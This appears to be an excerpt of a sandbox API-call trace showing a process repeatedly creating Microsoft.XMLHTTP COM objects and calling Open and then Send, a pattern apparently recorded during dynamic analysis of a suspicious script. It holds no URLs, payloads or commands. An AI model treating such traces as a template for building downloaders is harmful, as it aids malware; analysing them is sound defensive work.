	[0421.622] SysStringLen (param_1=0x0) returned 0x0
	[0421.622] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0421.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0421.622] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72b0) returned 0x0
	[0421.622] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0421.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0421.622] ??2@YAPEAX_K@Z () returned 0x62f310
	[0421.622] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f310) 
	[0421.622] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0421.622] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0421.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72b0) returned 0x0
	[0421.623] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72b0) returned 0x3
	[0421.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0421.623] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0421.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0421.626] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0421.626] SysStringLen (param_1=0x0) returned 0x0
	[0421.626] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0421.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0421.626] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0421.626] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0421.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0421.626] ??2@YAPEAX_K@Z () returned 0x62f330
	[0421.626] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0421.626] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0421.626] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0421.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0421.626] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0421.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0421.626] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0421.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0421.627] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0421.627] SysStringLen (param_1=0x0) returned 0x0
	[0421.627] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0421.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0421.627] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0421.627] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0421.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7348) returned 0x0
	[0421.627] ??2@YAPEAX_K@Z () returned 0x62f310
	[0421.627] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7348, pUnkSite=0x62f310) 
	[0421.627] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0421.627] XMLHTTPRequest:IUnknown:Release (This=0x49c7348) returned 0x0
	[0421.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0421.627] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0421.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0421.628] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0421.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0421.628] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0421.628] SysStringLen (param_1=0x0) returned 0x0
	[0421.628] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0421.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0421.628] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0421.628] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0421.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0421.628] ??2@YAPEAX_K@Z () returned 0x62f330
	[0421.628] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0421.628] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0421.628] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0421.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0421.628] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0421.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0421.629] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0421.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0421.629] longjmp () 
	[0421.629] longjmp () 
	[0421.629] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0421.629] SysStringLen (param_1=0x0) returned 0x0
	[0421.629] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0421.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0421.629] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0421.629] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0421.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0421.629] ??2@YAPEAX_K@Z () returned 0x62f310
	[0421.629] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f310) 
	[0421.629] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0421.629] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0421.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0421.630] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0421.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0421.630] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0421.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0421.630] longjmp () 
	[0421.630] longjmp () 
	[0421.630] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0421.630] SysStringLen (param_1=0x0) returned 0x0
	[0421.630] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0421.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0421.630] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0421.630] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0421.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0421.630] ??2@YAPEAX_K@Z () returned 0x62f330
	[0421.631] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0421.631] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0421.631] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0421.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0421.631] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0421.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0421.631] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0421.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0421.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0421.631] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0421.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0422.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
